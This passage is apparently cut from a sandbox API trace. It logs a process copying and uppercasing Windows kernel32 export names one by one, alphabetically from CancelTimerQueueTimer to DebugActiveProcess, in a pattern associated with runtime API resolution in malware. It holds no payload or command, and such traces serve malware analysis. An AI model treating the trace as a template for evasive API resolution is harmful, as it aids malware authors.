(lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.561] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.561] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.561] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.561] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.562] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.562] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.562] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.562] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.562] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.562] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.562] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.562] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.562] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.562] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.562] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.562] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.562] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.562] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.562] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.562] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.562] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.562] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.562] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.563] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.563] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.563] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.563] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.563] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.563] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.563] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.563] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.563] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.563] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.563] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.563] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.563] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.563] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.563] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.563] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.563] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.563] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.563] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.563] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.564] lstrlenA (lpString="COPYFILEA") returned 9 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.564] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.564] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.564] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.564] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.564] lstrlenA (lpString="COPYFILEW") returned 9 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.564] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.564] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.564] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.564] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.564] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.564] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.564] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.564] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.564] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.564] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.564] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.564] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.564] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.565] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.565] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.565] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.565] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.565] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.565] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.565] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.565] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.565] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.565] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.565] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.565] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.565] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.565] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.565] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.565] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.565] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.565] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.565] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.566] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.566] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.566] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.566] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.566] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.566] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.566] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.566] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.566] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.566] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.566] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.566] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.566] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.566] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.566] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.566] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.566] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.566] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.566] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.566] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.567] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.567] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.567] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.567] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.567] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.567] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.567] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.567] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.567] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.567] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.567] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.567] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.567] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.567] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.567] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.567] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.567] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.567] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.567] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.568] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.568] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.568] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.568] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.568] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.568] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.568] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.568] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.568] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.568] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.568] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.568] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.568] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.568] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.568] lstrcpyA (in: lpString1=0x36fd5a4, 